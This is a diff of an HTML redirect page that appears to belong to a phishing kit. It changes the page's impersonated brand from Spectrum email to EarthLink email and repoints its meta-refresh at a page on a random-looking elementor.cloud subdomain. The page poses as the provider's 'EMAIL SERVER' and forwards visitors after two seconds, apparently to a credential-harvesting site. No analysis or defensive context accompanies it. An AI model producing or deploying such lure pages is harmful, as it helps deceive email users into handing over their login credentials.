--- a/DE33.html
+++ b/DE33.html
@@ -2,11 +2,11 @@
 <html>
 <head>
 <title>Redirecting...</title>
-<meta http-equiv="refresh" content="2; url = https://aneblslm.elementor.cloud/" />
+<meta http-equiv="refresh" content="2; url = aneblslm.elementor.cloud/elementor-248" />
 </head>
-<P>SPECTRUM EMAIL
+<P>EARTHLINK EMAIL
 <body>
 <img src="">
-<p>SPECTRUM EMAIL SERVER. PLEASE WAIT... Redirecting...</p>
+<p>EARTHLINK EMAIL SERVER. PLEASE WAIT... Redirecting...</p>
 </body>
 </html>
